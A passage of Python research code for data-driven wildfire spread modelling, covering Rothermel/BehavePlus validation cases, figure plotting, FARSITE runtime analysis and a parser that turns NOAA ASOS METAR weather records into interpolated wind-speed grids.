allDirections.append(directions)
allRosVectors.append(rosVectors)
allParams = np.array(allParams).T
#pd.DataFrame(allParams[1:,:],columns=allParams[0,:]).astype(float).round(2).to_csv('../rothermelData/validationInputs.csv')
#pd.DataFrame(allDirections).T.to_csv('../rothermelData/validationDirections.csv')
#pd.DataFrame(allRosVectors).T.to_csv('../rothermelData/validationRosVectors.csv')
elif case == 2:
allParams = pd.read_csv('../rothermelData/validationInputs.csv')
allDirections = []
allRosVectors = []
for i in range(1,allParams.values.shape[1]):
paramsRaw = allParams.values[:,i]
params = paramListTodict(paramsRaw)
directions, rosVectors = getROSfromParams(params)
allParams.append(orderParams(params))
allDirections.append(directions)
allRosVectors.append(rosVectors)
allParams = np.array(allParams).T
pd.DataFrame(allDirections).T.to_csv('../rothermelData/validationDirections.csv')
pd.DataFrame(allRosVectors).T.to_csv('../rothermelData/validationRosVectors.csv')
elif case == 3:
numToRepeat = 5
allParams = pd.read_csv('../rothermelData/validationInputs.csv')
paramsRaw = allParams.values[:,numToRepeat]
params = paramListTodict(paramsRaw)
directions, rosVectors = getROSfromParams(params,toPrint=True)
behaveResults = pd.read_csv('../rothermelData/validationBehaveOutputs.csv')
behaveDirections = behaveResults.values[:,0]
behaveRos = behaveResults.values[:,numToRepeat]
rosVectorsResample = np.interp(behaveDirections,directions,rosVectors)
rmse = np.mean((rosVectorsResample-behaveRos)**2)**0.5
plt.figure(figsize=(4,4))
plt.plot(directions,rosVectors,label='prediction')
plt.plot(behaveDirections,behaveRos,label='behavePlus')
plt.legend()
ylim = [min([np.min(rosVectors),np.min(behaveRos),0]),max([np.max(rosVectors),np.max(behaveRos),1.0])]
plt.ylim(ylim)
plt.title(str(i)+': '+str(np.round(rmse,2)))
elif case == 4:
behaveResults = pd.read_csv('../rothermelData/validationBehaveOutputs.csv')
behaveDirections = behaveResults.values[:,0]
allDirections = pd.read_csv('../rothermelData/validationDirections.csv')
allRosVectors = pd.read_csv('../rothermelData/validationRosVectors.csv')
rmses = []
toPlot = True
for i in range(1,51):
behaveRos = behaveResults.values[:,i]
directions = allDirections.values[:,i]
rosVectors = allRosVectors.values[:,i]
rosVectorsResample = np.interp(behaveDirections,directions,rosVectors)
rmse = np.mean((rosVectorsResample-behaveRos)**2)**0.5
rmses.append(rmse)
if toPlot:
plt.figure(figsize=(4,4))
plt.plot(directions,rosVectors,label='prediction')
plt.plot(behaveDirections,behaveRos,label='behavePlus')
plt.legend()
ylim = [min([np.min(rosVectors),np.min(behaveRos),0]),max([np.max(rosVectors),np.max(behaveRos),1.0])]
plt.ylim(ylim)
plt.title(str(i)+': '+str(np.round(rmse,2)))
elif case == 5:
outdir = '../rothermelData/'
nsbase = outdir+'data'
modelIndexDict = determineFastestModel()
datasIn = []
datasOut = []
i = 0
k = 0
t1 = uc.tic()
while i <= 0:
#for i in range(0,4000):
params = getRandomConditions(paramsInput,allowDynamicModels=True)
if i == 0:
params['aspect'] = 160
params['model'] = 'FM1'
params['slope'] = 0.805
params['m1h'] = 5.26
params['m10h'] = 6.26
params['m100h'] = 7.26
params['lhm'] = 69
params['lwm'] = 49
params['canopyCover'] = 0.7
params['canopyHeight'] = 14
params['crownRatio'] = 0.2
params['windDir'] = 34
params['windSpeed'] = 13.5
directions, rosVectors = getROSfromParams(params,toPrint=False)
params['modelInd'] = modelIndexDict[params['model']]
if True:
fireImages, modelInputs = visualizeInputImgs(directions,rosVectors,params,resX=resX,resY=resY,toPlot=False)
for j in range(0,len(fireImages)-1):
data = [fireImages[j]]
data.extend(modelInputs)
datasIn.append(rearrangeDatas(data))
datasOut.append(rearrangeDatas([fireImages[j+1]]))
if i % 1000 == 0 and False:
datasIn = np.squeeze(datasIn)
datasOut = np.squeeze(datasOut)
uc.dumpPickle([datasIn,datasOut],outdir+'dataRemakeTest'+str(len(datasOut))+'_'+str(k)+'.pkl')
datasIn = []
datasOut = []
k = k + 1
i = i + 1
print(uc.toc(t1))
#assert False, "Stopped"
#uc.dumpPickle([datasIn,datasOut],outdir+'dataBehaveMoist'+str(len(datasOut))+'_'+str(k)+'.pkl')
imgFire = visualizeInputValues(directions,rosVectors,params,resX=resX,resY=resY)
elif case == 6:
import glob
outdir = '../rothermelData/'
dataFile = outdir+'dataBehaveMoist3000'
files = glob.glob(dataFile+'*.pkl')
ns = outdir+'behaveMoistData'
allIn = []
allOut = []
for i in range(0,len(files)):
[inData,outData] = uc.readPickle(files[i])
allIn.extend(inData)
allOut.extend(outData)
datas = (inData,outData)
elif case == 7:
from matplotlib.offsetbox import OffsetImage, AnnotationBbox
networkRaw = np.loadtxt('exampleNetworkRaw0.csv',delimiter=',')
networkProcessed = np.loadtxt('exampleNetworkProcessed0.csv',delimiter=',')
fs = 16
fig, ax = plt.subplots(figsize=(16,8))
a = []
lims = [[-30,30],[-20,20],[-20,20],[30,150],[30,150],[0,30],[0,30],[0,30],[0,1],[0,20],[0,1],[0,53]]
names = ['Elevation','East Wind','North Wind','Live Herbaceous Moisture','Live Woody Moisture','1-Hour Moisture','10-Hour Moisture','100-Hour Moisture','Canopy Cover','Canopy Height','Crown Ratio','Fuel Model']
textOffset = [0]
#modelInputs = [elevImg,windX,windY,lhmImg,lwmImg,m1hImg,m10hImg,m100hImg,canopyCoverImg,canopyHeightImg,crownRatioImg,modelImg]
for i in range(len(modelInputs)-1,-1,-1):
img = modelInputs[i].copy()
img[-1,-1] = lims[i][0]
img[-1,-2] = lims[i][1]
oi = OffsetImage(img, zoom = 2.0, cmap='hot_r')
box = AnnotationBbox(oi, (-0.5*i,1*i), frameon=True)
a.append(ax.add_artist(box))
ax.annotate(names[i],xy=(-0.5*i-1.5,1*i-1.6),xycoords='data',textcoords='data',xytext=(-0.5*i-5-(len(names[i])-10)*0.1,1*i-1.525),arrowprops=dict(facecolor='black',shrink=0.05),fontsize=fs)
i = -1
fireImages[1][fireImages[1] == 255] = 1
#fireImages[1][-1,-1] = 2
norm = matplotlib.colors.Normalize(vmin=0, vmax=2)
oi = OffsetImage(fireImages[1], zoom = 2.0, cmap='hot_r',norm=norm)
box = AnnotationBbox(oi, (-0.5*i,1*i), frameon=True)
ax.annotate('Initial Burn Map',xy=(-0.5*i-1.5,1*i-1.6),xycoords='data',textcoords='data',xytext=(-0.5*i-5,1*i-1.525),arrowprops=dict(facecolor='black',shrink=0.05),fontsize=fs)
a.append(ax.add_artist(box))
'''
oi = OffsetImage([[0,0],[0,0]], zoom = 2.0, cmap='hot_r')
box = AnnotationBbox(oi, (-0.5*i,1*i), frameon=True)
ax.annotate('Initial Burn Map',xy=(-0.5*i-1.5,1*i-1.6),xycoords='data',textcoords='data',xytext=(-0.5*i-5,1*i-1.525),arrowprops=dict(facecolor='black',shrink=0.05),fontsize=fs)
a.append(ax.add_artist(box))
'''
i = 6# 6
imgX = 3.50
ax.annotate('',xy=(imgX,1*i),xycoords='data',textcoords='data',xytext=(imgX-2,1*i),arrowprops=dict(facecolor='black',shrink=0.01,width=50,headwidth=100,headlength=30))
ax.annotate('Convolutional\nNeural Network',xy=(imgX-0.9,1*i-0.9),xycoords='data',textcoords='data',xytext=(imgX-2.5,1*i-2.85),fontsize=fs)
imgX = 5.5
i = 3
oi = OffsetImage(networkRaw, zoom = 2.0, cmap='hot_r')
box = AnnotationBbox(oi, (imgX,1*i), frameon=True)
ax.annotate('Probability of\nFire',xy=(imgX-0.8,1*i-0.9),xycoords='data',textcoords='data',xytext=(imgX-1.1,1*i-2.85),fontsize=fs)
a.append(ax.add_artist(box))
imgX = 5.5
i = 10
oi = OffsetImage(1-networkRaw, zoom = 2.0, cmap='hot_r')
box = AnnotationBbox(oi, (imgX,1*i), frameon=True)
ax.annotate('Probability of\nNot Fire',xy=(imgX-0.8,1*i-0.9),xycoords='data',textcoords='data',xytext=(imgX-1.1,1*i-2.85),fontsize=fs)
a.append(ax.add_artist(box))
i = 6# 6
imgX = 9.5
ax.annotate('',xy=(imgX,1*i),xycoords='data',textcoords='data',xytext=(imgX-2,1*i),arrowprops=dict(facecolor='black',shrink=0.01,width=50,headwidth=100,headlength=30))
ax.annotate('Post Processing',xy=(imgX-1.1,1*i-1.4),xycoords='data',textcoords='data',xytext=(imgX-2.25,1*i-2.85),fontsize=fs)
imgX = 11.5
i = 6
oi = OffsetImage(networkProcessed, zoom = 2.0, cmap='hot_r')
box = AnnotationBbox(oi, (imgX,1*i), frameon=True)
ax.annotate('Burn Map\nAfter 6 Hours',xy=(imgX-1.5,1*i-0.9),xycoords='data',textcoords='data',xytext=(imgX-1.15,1*i-2.85),fontsize=fs)
a.append(ax.add_artist(box))
plt.ylim(-2.6,12.5)
plt.xlim(-10,12.5)
#plt.ylim(-50,50)
plt.axis('off')
plt.tight_layout()
plt.savefig('..%soutputs%sinputsExampleSingleFire.eps'%(os.sep, os.sep))
makeFirePerimetersFigure(imgFire)
```
#### File: datadriven-wildfire-spread/scripts/checkFARSITErunTime.py
```python
import glob
import matplotlib.pyplot as plt
import numpy as np
def getTime(file):
with open(file,'r') as f:
lines = f.readlines()
simTime = -1
for line in lines:
if 'Total Farsite Run Time' in line:
simTime = float(line.split()[4])
return simTime
if __name__ == "__main__":
inDir = "E://projects//wildfire-research//farsite//data//"
files = glob.glob(inDir+"*_Timings.txt")
simTimes = []
for i in range(0,len(files)):
simTime = getTime(files[i])
simTimes.append(simTime)
simTimes = np.array(simTimes)
simTimes2 = simTimes.copy()
simTimes2 = simTimes2[simTimes2>60]
simTimes2 = simTimes2[simTimes2<3600*10]
simTimeMean = np.mean(simTimes2)
simTimeStd = np.std(simTimes2)
plt.figure(figsize=(12,12))
fs = 32
lw = 3
plt.hist(simTimes/3600,bins=10000,cumulative=True,normed=True,histtype='step',linewidth=lw)
plt.xlim(0,6)
plt.xlabel('FARSITE computational time (hours)',fontsize=fs)
plt.ylabel('Cumulative Probality',fontsize=fs)
plt.tick_params(labelsize=fs)
plt.tight_layout()
plt.savefig('wfsm_farsiteCompTime.pdf',dpi=300)
```
#### File: datadriven-wildfire-spread/scripts/parse_asos_file.py
```python
import numpy as np
import datetime as dt
import math
#from matplotlib.mlab import griddata
from scipy.interpolate import griddata
import glob
import pickle
import sys
import util_common as uc
class ASOSMeasurementList(object):
''' This class contains a list of ASOS measurements
'''
__slots__ = ['dateTime','temperatureC','relativeH','directionDeg','speedMps','gustMps']
def __init__(self):
self.dateTime = []
self.temperatureC = []
self.relativeH = []
self.directionDeg = []
self.speedMps = []
self.gustMps = []
def addTime(self,dateTime,temperatureC,relativeH,directionDeg,speedMps,gustMps):
''' This function adds a measurement time
'''
self.dateTime.append(dateTime)
self.temperatureC.append(temperatureC)
self.relativeH.append(relativeH)
self.directionDeg.append(directionDeg)
self.speedMps.append(speedMps)
self.gustMps.append(gustMps)
class ASOSStation(object):
''' This class contains meta-data information for an ASOS station and lists
of ASOS meaurements.
'''
__slots__ = ['latitude','longitude','name','call',
'dateTime','temperatureC','relativeH','directionDeg','speedMps','gustMps',
#'ncdcid','wban','coopid','aname','country','state','county','elevation','utc','stntype',
'dateTime']
def __init__(self,info):
self.call = info[3]
self.name = info[4]
self.latitude = info[9]
self.longitude = info[10]
#self.ncdcid = info[0]
#self.wban = info[1]
#self.coopid = info[2]
#self.aname = info[5]
#self.country = info[6]
#self.state = info[7]
#self.county = info[8]
#self.elevation = info[11]
#self.utc = info[12]
#self.stntype = info[13]
self.temperatureC = [] # List of temperature measurements in deg C
self.relativeH = [] # List of relative humidity measurements
self.directionDeg = [] # List of wind direction in degrees
self.speedMps = [] # List of wind speed measurements in m/s
self.gustMps = [] # List of wind gust speed measuremetns in m/s
self.dateTime = [] # List of time stamps
def computeMemory(self):
''' This function calculates the memory requirements of the object
'''
mem = 0
slots = self.__slots__
for key in slots:
if type(key) == list:
mem = mem + sys.getsizeof(getattr(self,key))/1024**2
else:
mem = mem+sys.getsizeof(getattr(self,key))/1024**2
return mem
def __str__(self):
''' This function prints summary information of the object when a
string is requested.
'''
string = "%s ASOS Station\n"%(self.name)
string = string + "\tTotal measurements:\t%.0f\n"%(len(self.dateTime))
string = string + "\tEarliest dateTime:\t%s\n"%(min(self.dateTime))
string = string + "\tLatest dateTime:\t%s\n"%(max(self.dateTime))
return string
def __repr__(self):
''' This function prints summary information of the object when a
string is requested.
'''
return self.__str__()
def addTime(self,data):
''' This function adds a measurement time to the object
'''
self.temperatureC.extend(data.temperatureC)
self.relativeH.extend(data.relativeH)
self.directionDeg.extend(data.directionDeg)
self.speedMps.extend(data.speedMps)
self.gustMps.extend(data.gustMps)
self.dateTime.extend(data.dateTime)
def timeAverage(self,timeRange):
''' This function calcualtes the average measurement during a time
interval.
'''
dateTimeNp = []
for i in self.dateTime:
dateTimeNp.append(np.datetime64(i))
dateTimeNp = np.array(dateTimeNp)
deltaTimeNp = np.array(dateTimeNp-dateTimeNp[0],dtype=np.float32)
deltaTimeNp = deltaTimeNp/(10**6*3600)
temperatureC = np.array(self.temperatureC,dtype=np.float32)
relativeH = np.array(self.relativeH,dtype=np.float32)
directionDeg = np.array(self.directionDeg,dtype=np.float32)
speedMps = np.array(self.speedMps,dtype=np.float32)
gustMps = np.array(self.gustMps,dtype=np.float32)
dataNp = np.array([deltaTimeNp,temperatureC,relativeH,directionDeg,speedMps,gustMps],dtype=np.float32).T
dataNp = nanInterp(dataNp.copy())
deltat = 2*(timeRange.days*24+(0+(timeRange.seconds+timeRange.microseconds/10**6)/60)/60)
maxt = np.floor(np.max(dataNp[:,0]))
mint = np.min(dataNp[:,0])
t = np.linspace(mint,maxt,int((maxt-mint)/deltat+1))
dataNpI = np.zeros((len(t),dataNp.shape[1]),dtype=np.float32)
dataNpI[:,0] = t
dateTime = []
basetime = min(self.dateTime)
for i in range(1,dataNp.shape[1]):
dataNpI[:,i] = np.interp(t,dataNp[:,0],dataNp[:,i])
for i in range(0,dataNpI.shape[0]):
dateTime.append(dt.timedelta(hours=int(dataNpI[i,0]))+basetime)
self.dateTime = dateTime
self.temperatureC = dataNpI[:,1]
self.relativeH = dataNpI[:,2]
self.directionDeg = dataNpI[:,3]
self.speedMps = dataNpI[:,4]
self.gustMps = dataNpI[:,5]
return dataNp
def findTime(self,queryDateTime):
''' This function returns the index of the best matching time in the
database to the query time.
'''
bestMatchValue = min(self.dateTime, key=lambda d: abs(d-queryDateTime))
bestMatchIndex = self.dateTime.index(bestMatchValue)
return bestMatchIndex
def extractTimeAverage(self,queryDateTime,timeRange):
''' This function extracts the time avarege centered at a query time
with a delta time range specified.
'''
def list2avg(dataL,inds):
dataNp = np.array(dataL)
dataNp[np.equal(dataNp,None)] = np.nan
dataNp = np.array(dataNp,dtype=np.float32)
if not np.all(np.isnan(dataNp[inds[0]:inds[1]])):
data = np.nanmean(dataNp[inds[0]:inds[1]])
return data
else:
return np.nan
bestLowValue = min(self.dateTime, key=lambda d: abs(d-(queryDateTime-timeRange)))
bestHighValue = min(self.dateTime, key=lambda d: abs(d-(queryDateTime+timeRange)))
bestLowIndex = self.dateTime.index(bestLowValue)
bestHighIndex = self.dateTime.index(bestHighValue)
bestMatchValue = min(self.dateTime, key=lambda d: abs(d-(queryDateTime)))
bestMatchIndex = self.dateTime.index(bestMatchValue)
temperatureC = list2avg(self.temperatureC,[bestLowIndex,bestHighIndex+1])
relativeH = list2avg(self.relativeH,[bestLowIndex,bestHighIndex+1])
directionDeg = list2avg(self.directionDeg,[bestLowIndex,bestHighIndex+1])
speedMps = list2avg(self.speedMps,[bestLowIndex,bestHighIndex+1])
gustMps = list2avg(self.gustMps,[bestLowIndex,bestHighIndex+1])
return np.array([queryDateTime,temperatureC,relativeH,directionDeg,speedMps,gustMps])
def sortMeasurements(self):
''' This function will sort the measurements in the database in
ascending order based on acquisition time.
'''
self.temperatureC = [x for _, x in sorted(zip(self.dateTime,self.temperatureC), key=lambda pair: pair[0])]
self.relativeH = [x for _, x in sorted(zip(self.dateTime,self.relativeH), key=lambda pair: pair[0])]
self.directionDeg = [x for _, x in sorted(zip(self.dateTime,self.directionDeg), key=lambda pair: pair[0])]
self.speedMps = [x for _, x in sorted(zip(self.dateTime,self.speedMps), key=lambda pair: pair[0])]
self.gustMps = [x for _, x in sorted(zip(self.dateTime,self.gustMps), key=lambda pair: pair[0])]
self.dateTime.sort()
def convertKnots(speedKnot):
''' This function will convert a wind speed in knots to m/s
'''
if speedKnot is not None:
speedMps = speedKnot*0.514444
return speedMps
def findGeoLimits(stations):
''' This function will find the extents of latitude and longitude covered
by stations in the database.
'''
minLatitude = 360
maxLatitude = -360
minLongitude = 360
maxLongitude = -360
for key, value in stations.items():
if value.latitude < minLatitude:
minLatitude = value.latitude
if value.latitude > maxLatitude:
maxLatitude = value.latitude
if value.longitude < minLongitude:
minLongitude = value.longitude
if value.longitude > maxLongitude:
maxLongitude = value.longitude
return [minLatitude,maxLatitude,minLongitude,maxLongitude]
def stationsSortMeasurements(stations):
''' This function will call each station in the database and sort the
measurements in ascending order by acquisition time.
'''
for key, value in stations.items():
value.sortMeasurements()
return stations
def convertVector(speedMps,directionDeg):
''' This function will convert wind speed measurements from polar
coordinates to Cartesian coordinates.
'''
if directionDeg == -1:
speedX = speedMps/(2**0.5)
speedY = speedMps/(2**0.5)
elif directionDeg is None:
pass
print("Wind direction was not set.")
elif speedMps is None:
pass
print("Wind speed was not set.")
else:
try:
speedX = speedMps*np.sin(directionDeg/180*math.pi)
speedY = speedMps*np.cos(directionDeg/180*math.pi)
except:
assert False, "Unknown wind vector: %s Mps %s Deg" % (str(speedMps),str(directionDeg))
return speedX, speedY
def getStationsMeasurements(stations,queryDateTime,timeRange):
''' This function will return the average measurements from a specified
query time and time range for each station.
'''
measurements = []
for key, value in stations.items():
data = value.extractTimeAverage(queryDateTime,timeRange)
directionDeg = data[3]
speedMps = data[4]
speedX, speedY = convertVector(speedMps,directionDeg)
measurements.append([value.latitude,value.longitude,speedX,speedY])
measurements = np.array(measurements)
return measurements
def defineStations(filename):
''' This function reads the meta-data for each station from an input
file. Input file obtained from: https://www.ncdc.noaa.gov/homr/reports
'''
def str2Int(s):
s = s.strip()
return int(s) if s else np.nan
with open(filename) as f:
content = f.readlines()
stations = dict()
for line in content:
if "NCDCID" not in line and '-------- ----- ------ ----' not in line:
NCDCID = str2Int(line[0:8].strip())
WBAN = str2Int(line[9:14].strip())
COOPID = str2Int(line[15:21].strip())
CALL = line[22:26].strip()
NAME = line[27:57].strip()
ANAME = line[58:88].strip()
COUNTRY = line[89:109].strip()
ST = line[110:112].strip()
COUNTY = line[113:143].strip()
LAT = float(line[144:153].strip())
LON = float(line[154:164].strip())
ELEV = float(line[165:171].strip())
UTC = float(line[172:177].strip())
STNTYPE = line[178:-1].strip()
if ST == 'CA' or ST == 'AZ' or ST == 'OR' or ST == 'NV':
stCheck = True
else:
stCheck = False
if CALL not in stations and stCheck:
stations[CALL] = ASOSStation([NCDCID,WBAN,COOPID,CALL,NAME,ANAME,COUNTRY,ST,COUNTY,LAT,LON,ELEV,UTC,STNTYPE])
#if CALL in stations:
# stations[CALL].addTime(splitLine)
#else:
# stations[CALL] = ASOSStation(splitLine)
# stations[CALL].addTime(splitLine)
return stations
def parseMETARline(line,debug=False):
''' This function will read a single METAR line and return air
temperature, relative humidity, wind direction, wind speed, gust speed,
and time information.
NOTE: The input METAR files were obtained from:
ftp://ftp.ncdc.noaa.gov/pub/data/asos-fivemin/
NOTE: Not all measurements are published for every METAR station. Missing
measurementes are returned as None.
NOTE: The lines in the file tend to not follow the specified format
published by NOAA in the Automated Surface Observing Systemm User's
Guide. When parts of a line cannot be determined, None is returned for
that measurement. Other measurements will still try to be parsed.
'''
line_split = line.split(' ')
start_index = line_split.index('5-MIN') if '5-MIN' in line_split else -1
if start_index == -1:
print("Unable to find 5-MIN string to start parsing:") if debug else -1
print(line) if debug else -1
return None
end_index = line_split.index('RMK') if 'RMK' in line_split else -1
line_split = line_split[start_index+1:end_index]
filecall = line_split[0]
if line_split[1][0:-1].isdigit() and len(line_split[1]) == 7:
pass
day = int(line_split[1][0:2])
hour = int(line_split[1][2:4])
minute = int(line_split[1][4:6])
else:
return None
#data.auto = False
sm = 0
#data.sky_condition = []
#data.weather_condition = []
temperatureC = None
relativeH = None
directionDeg = None
speedMps = None
gustMps = None
#data.temperature_dew = 'M'
line_split = [x for x in line_split if x]
for i in range(2,len(line_split)):
if line_split[i] == 'AUTO':
#data.auto = True
pass
elif 'KT' in line_split[i]:
filewind = line_split[i].split('KT')[0]
if 'G' in filewind:
if filewind.split('G')[1].isdigit():
gustMps = convertKnots(float(filewind.split('G')[1]))
else:
print("Failed to parse wind gust:") if debug else -1
print(line) if debug else -1
filewind = filewind.split('G')[0]
if 'VRB' in filewind:
filewind = filewind.split('VRB')[1]
directionDeg = -1
else:
try:
directionDeg = float(filewind[0:3])
except:
print("Error parsing direction.") if debug else -1
print(line) if debug else -1
try:
speedMps = convertKnots(float(filewind[-2:]))
except:
print("Error parsing windspeed.") if debug else -1
print(line) if debug else -1
elif 'V' in line_split[i] and len(line_split[i]) == 7 and 'KT' in line_split[i-1]:
#data.directionDegVar = [float(line_split[i][0:3]),float(line_split[i][4:])]
pass
elif 'SM' in line_split[i]:
linesm = line_split[i].split('SM')[0]
try:
if linesm[0] == 'M':
linesm = linesm[1:]
except:
print(line_split[i]) if debug else -1
if '/' in linesm:
if linesm.split('/')[0].isdigit() and linesm.split('/')[1].isdigit():
sm += float(linesm.split('/')[0])/float(linesm.split('/')[1])
print("Error parsing visibility:") if debug else -1
print(line) if debug else -1
else:
try:
sm += float(linesm)
except:
print("Error parsing visibility:") if debug else -1
print(line) if debug else -1
elif line_split[i][0] == 'R' and len(line_split[i]) >= 10:
if line_split[i][-2:] == 'FT':
#data.rvr = line_split[i]
pass
elif ('BKN' in line_split[i] or 'CLR' in line_split[i]
or 'FEW' in line_split[i] or 'SCT' in line_split[i]
or 'OVC' in line_split[i]):
#data.sky_condition.append([line_split[i][0:3],line_split[i][3:]])
pass
elif ('RA' in line_split[i] or 'SN' in line_split[i]
or 'UP' in line_split[i] or 'FG' in line_split[i]
or 'FZFG' in line_split[i] or 'BR' in line_split[i]
or 'HZ' in line_split[i] or 'SQ' in line_split[i]
or 'FC' in line_split[i] or 'TS' in line_split[i]
or 'GR' in line_split[i] or 'GS' in line_split[i]
or 'FZRA' in line_split[i] or 'VA' in line_split[i]):
#data.weather_condition.append(line_split[i])
pass
elif line_split[i][0] == 'A' and len(line_split[i]) == 5:
try:
altimeter = float(line_split[i][1:])
except:
print("Error parsing altitude.") if debug else -1
print(line) if debug else -1
elif '/' in line_split[i] and len(line_split[i]) == 5: #data.temperatureC == None:
linetemp = line_split[i].split('/')
temperature_air_sign = 1
temperature_dew_sign = 1
if 'M' in linetemp[0]:
temperature_air_sign = -1
linetemp[0] = linetemp[0].split('M')[1]
if 'M' in linetemp[1]:
temperature_dew_sign = -1
linetemp[1] = linetemp[1].split('M')[1]
if linetemp[0].isdigit():
temperatureC = float(linetemp[0])*temperature_air_sign
if linetemp[1].isdigit():
#data.temperature_dew = float(linetemp[1])*temperature_dew_sign
temperatureDew = float(linetemp[1])*temperature_dew_sign
pass
if linetemp[0].isdigit() and linetemp[1].isdigit():
#data.relativeH = 100-5*(data.temperatureC-data.temperature_dew)
relativeH = 100-5*(temperatureC-temperatureDew)
else:
if i < len(line_split)-1:
if 'SM' in line_split[i+1] and '/' in line_split[i+1] and line_split[i].isdigit():
try:
sm += float(line_split[i])
except:
print(line) if debug else -1
print(line_split) if debug else -1
else:
pass
#print('Unknown argument %s at %.0f.' % (line_split[i],0))
else:
pass
#print('Unknown argument %s at %.0f.' % (line_split[i],1))
if sm == 0:
#data.sm = None
pass
else:
#data.sm = sm
pass
return [temperatureC,relativeH,directionDeg,speedMps,gustMps], [day,hour,minute]
def parseMETARfile(file):
''' This function will load data from an input METAR file.
'''
dateTimes = []
datas = ASOSMeasurementList()
with open(file) as f:
old_day = 0
content = f.readlines()
if content is not None:
#print(len(content))
i = 0
for line in content:
data = None
try:
data, times = parseMETARline(line)
except:
print("Failed to parse the METAR line in file %s line %.0f."%(file,i))
pass
day = times[0]
hour = times[1]
minute = times[2]
if data is not None:
year = int(file[-10:-6])
month = int(file[-6:-4])
if day < old_day:
month = month + 1
if month > 12:
month = 1
year = year + 1
old_day = day
dateTime = dt.datetime(year=year,month=month,day=day,hour=hour,minute=minute)
datas.addTime(dateTime,data[0],data[1],data[2],data[3],data[4])
i = i+1
return datas, dateTimes
def readStationsFromText(filename='../data-test/asos-stations.txt',
datadirs=['G:/WildfireResearch/data/asos-fivemin/6401-2016/'],
timeRange = dt.timedelta(days=0,hours=0,minutes=30)):
''' This function will generate a list of ASOSStations which contain
all the measurements found in the list of directories contained in
datadirs. The timeRange option determine what temporal range to use in
averaging.
'''
stations = defineStations(filename)
empty_stations = []
totalMem = 0
keys = list(stations.keys())
for i in range(0,len(keys)):#key in stations.keys():
key = keys[i]
call = stations[key].call
files = []
for datadir in datadirs:
fs = glob.glob(datadir+'*'+call+'*')
files.extend(fs)
if len(files) != 0:# and key == 'WVI':
for file in files:
data, dateTime = parseMETARfile(file)
stations[key].addTime(data)
#stations[key].addTime(data)
stations[key].dateTime.extend(dateTime)
localMem = stations[key].computeMemory()
_ = stations[key].timeAverage(timeRange)
reducMem = stations[key].computeMemory()
totalMem = totalMem+reducMem
print("Station %s\n\tRaw memory:\t%.04f MB\n\tReduced Memory:\t%0.4f MB\n\tTotal Memory:\t%.04f MB"%(key,localMem,reducMem,totalMem))
else:
empty_stations.append(key)
print("%s was empty."%(key))
print("Percent complete: %.4f"%((i+1)/len(keys)))
for key in empty_stations:
stations.pop(key,None)
for key in stations:
stations[key].sortMeasurements()
print("Finished %s, total Memory: %0.4f MB"%(key,computeStationsMemory(stations,printSummary=False)))
return stations
def dumpPickleStations(stations,filename='../data-test/asos-stations.pkl'):
''' This function will dump a stations file to pickle
'''
with open(filename,'wb') as f:
pickle.dump(stations,f)
def readPickleStations(filename='../data-test/asos-stations.pkl'):
''' This function will read a stations file from pickle
'''
with open(filename,'rb') as f:
stations = pickle.load(f)
return stations
def computeStationsMemory(stations,printSummary=True):
''' This function will calculate the total memory used by a list of
stations.
'''
mem = 0
for station in stations:
mem2 = stations[station].computeMemory()
print("Station %s Memory %.4f"%(station,mem2))
mem = mem+mem2
print("Total Memory: %0.4f MB"%(mem)) if printSummary else -1
return mem
def nanInterp(data):
''' This function will interpolate nan values in a dataset.
'''
x = data[:,0]
for i in range(1,len(data[0,:])):
y = data[:,i]
nans = np.where(~np.isfinite(y))[0]
y[nans] = np.nan
data[nans,i] = np.interp(x[nans],x[~nans],y[~nans])
return data
def buildCoordinateGrid(stations,resolution=111):
''' This function will build a latitude and longitude grid using the
limits of the station file at the resolution specified in pixels per
degree of latitude and longitude.
NOTE: 1 degree is approximately 69 miles, or 111 km
NOTE: Modis resolution is approximately 1km
NOTE: Thus, 111 pixels per degree will match modis resolution
'''
geoLimits = findGeoLimits(stations)
latGrid = np.linspace(geoLimits[0]-1,geoLimits[1]+1,int((geoLimits[1]-geoLimits[0]+2)*resolution+1))
lonGrid = np.linspace(geoLimits[2]-1,geoLimits[3]+1,int((geoLimits[3]-geoLimits[2]+2)*resolution+1))
return latGrid, lonGrid
def getSpeedContours(measurements,lat,lon):
''' This function will build a contour map of measurements using point
measurements at known latitude and longitudes.
'''
if True:
speedXcontour = griddata(measurements[:,:2][:,::-1],measurements[:,2], (lon, lat), method='linear').T
speedYcontour = griddata(measurements[:,:2][:,::-1],measurements[:,3], (lon, lat), method='linear').T
else:
speedXcontour = griddata(measurements[:,0],measurements[:,1],measurements[:,2],lat,lon,method='linear').T
speedYcontour = griddata(measurements[:,0],measurements[:,1],measurements[:,3],lat,lon,method='linear').T
return speedXcontour, speedYcontour
def queryWindSpeed(queryDateTime,
filename='../data-test/asos-stations.pkl',
resolution=111,
timeRange = dt.timedelta(days=0,hours=0,minutes=30)):
''' This is the function which is called to query wind speed at a
specific time.
'''
stations = readPickleStations(filename=filename)
lat, lon = buildCoordinateGrid(stations,resolution=resolution)
measurements = getStationsMeasurements(stations,queryDateTime,timeRange)
lon, lat = np.meshgrid(lon,lat)
speedX, speedY = getSpeedContours(measurements,lat,lon)
return lat, lon, speedX, speedY
if __name__ == "__main__":
''' Example cases:
case 0: Load raw data, dump raw data, plot data at query time
case 1: Load pickled data, compute memory requirements
case 2: Load pickled data, plot data at query time
'''
case = 2
filename = '../data-test/asos-stations.txt'
datadirs=['G:/WildfireResearch/data/asos-fivemin/6401-2016/',
'G:/WildfireResearch/data/asos-fivemin/6401-2017/']
resolution = 111 # pixels per degree
queryDateTime = dt.datetime(year=2016,month=6,day=17,hour=5,minute=53)
timeRange = dt.timedelta(days=0,hours=0,minutes=30)
if case == 0:
stations = readStationsFromText(filename=filename,datadirs=datadirs)
dumpPickleStations(stations,filename=filename[0:-4]+'.pkl')
#computeStationsMemory(stations)
lat, lon = buildCoordinateGrid(stations,resolution=resolution)
measurements = getStationsMeasurements(stations,queryDateTime,timeRange)
speedX, speedY = getSpeedContours(measurements,lat,lon)
speedX_fig = uc.plotContourWithStates(lat,lon,speedX,label='m/s',
states=None,
clim=None,xlim=None,ylim=None)
speedY_fig = uc.plotContourWithStates(lat,lon,speedY,label='m/s',
states=None,
clim=None,xlim=None,ylim=None)
if case == 1:
stations = readPickleStations(filename=filename[0:-4]+'.pkl')
computeStationsMemory(stations)
elif case == 2:
stations = readPickleStations(filename=filename[0:-4]+'.pkl')
#computeStationsMemory(stations)
lat, lon = buildCoordinateGrid(stations,resolution=resolution)
lat_grid, lon_grid = np.meshgrid(lat, lon)
measurements = getStationsMeasurements(stations,queryDateTime,timeRange)
speedX, speedY = getSpeedContours(measurements,lat_grid,lon_grid)
